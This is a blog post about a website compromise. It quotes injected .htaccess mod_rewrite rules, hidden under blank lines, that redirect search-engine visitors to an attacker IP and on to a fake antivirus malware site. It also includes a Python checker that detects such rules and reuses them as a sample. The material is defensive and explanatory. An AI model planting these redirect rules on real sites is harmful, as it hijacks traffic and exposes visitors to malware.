Gnarly Malware – Hijacks Website .htaccess and Steals Search Engine Traffic
Posted by Hodge on Jan 14, 2009 in Security, Web Development
A friend in the US called me a few days ago, asking me to take a look at his website, calypsoislandtours.com, since his site traffic had dropped dramatically, for no obvious reason. Upon further investigation, he discovered that only search engine traffic was affected, which, as with many if not most websites, happened to be a major proportion of his inbound traffic – not particularly good for his business.
I searched Google for his site, and sure enough, clicking on one of the results redirected my browser to a rather dodgy website that clearly wasn’t calypsoislandtours.com. So, I investigated further, and found that somehow, the .htaccess file on his server had been altered, to contain the following lines:
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.201/in.html?s=xi [R,L]
These lines were also preceded by a couple of dozen lines of white space, so that to most users checking .htaccess the code would be “hidden” below the viewable window of an average text editor (I used the Linux command more, via ssh, to check the file).
Basically, this nasty little piece of code utilises mod_rewrite to tell Apache to look for any traffic coming to the server from Google, AOL, MSN, Altavista, Ask or Yahoo (all the big search engines), and then to redirect that traffic to a server with the IP 89.28.13.201 (in a second .htaccess file, the IP was 89.28.13.205).
Using a combination of traceroute and the Lynx web browser, I tracked the redirects. The web server at 89.28.13.201 sets a cookie (visited=1) and also contains a script that redirects through a chain of sites: first to worldgreenpeace.cn, which sets a cookie soft=1. This site then redirects the browser to the final destination, bestantivirusfastscan.com, which sets a cookie av_inst=880147 (an arbitrary ID number, although it seems that 880147 people may have been redirected already). This final site contains malware, which I presume does something nasty, although I felt no inclination to investigate further!
Thankfully, it was easy to cure – I simply deleted the above lines from .htaccess, and the website was instantly back to normal, receiving the search engine traffic it should.
So, if you’re noticing a massive drop in search engine traffic to your site for no apparent reason, check the .htaccess first!
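Checking by eye is exactly what the leading white space is designed to defeat, so here is a small checker, added as an example and not part of the original post, that parses a .htaccess file the way mod_rewrite reads it (each run of RewriteCond lines applies to the RewriteRule that follows), flags any rule that redirects search-engine-referred visitors to an external URL, and counts the blank lines padding the top of the file. The function names, the search-engine list and the sample file contents are my own assumptions; the sample reuses the rule chain quoted above.

```python
import re
from typing import Dict, List

# Referer keywords the hijack above keyed on (assumed list; extend as needed).
SEARCH_ENGINES = ("google", "aol", "msn", "altavista", "ask", "yahoo")

# Constructed sample: 30 blank lines push the rule chain below the fold,
# followed by a shortened copy of the malicious block quoted in the post.
SAMPLE_HTACCESS = "\n" * 30 + """RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://89.28.13.201/in.html?s=xi [R,L]
"""


def leading_blank_lines(text: str) -> int:
    """Number of empty/whitespace-only lines before the first directive."""
    count = 0
    for raw in text.splitlines():
        if raw.strip():
            break
        count += 1
    return count


def find_referer_hijacks(text: str) -> List[Dict]:
    """Return RewriteRules whose preceding RewriteConds test HTTP_REFERER
    for a search engine and whose target is an absolute external URL."""
    findings = []
    pending = []  # (line, variable, pattern) of RewriteConds not yet consumed
    for lineno, raw in enumerate(text.splitlines(), 1):
        parts = raw.strip().split()
        if not parts or parts[0].startswith("#"):
            continue
        directive = parts[0].lower()
        if directive == "rewritecond" and len(parts) >= 3:
            pending.append((lineno, parts[1], parts[2]))
            continue
        if directive == "rewriterule" and len(parts) >= 3:
            target = parts[2]
            engines = sorted({e for _, var, pat in pending
                              if var.upper() == "%{HTTP_REFERER}"
                              for e in SEARCH_ENGINES if e in pat.lower()})
            if engines and re.match(r"https?://", target, re.I):
                findings.append({"line": lineno, "target": target, "engines": engines,
                                 "bare_ip": bool(re.match(r"https?://\d{1,3}(\.\d{1,3}){3}", target))})
        pending = []  # any other directive ends the RewriteCond chain
    return findings
```

A legitimate redirect that sends search-engine visitors to a path on the same site (a relative target) is not reported, so the output is short enough to review by hand.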
Something not quite right? Inaccuracies or invalid code? Didn’t work for you? Don’t like me using Ss instead of Zs? Add a comment below! All comments are welcome. Except spam, because spam is a bit crap.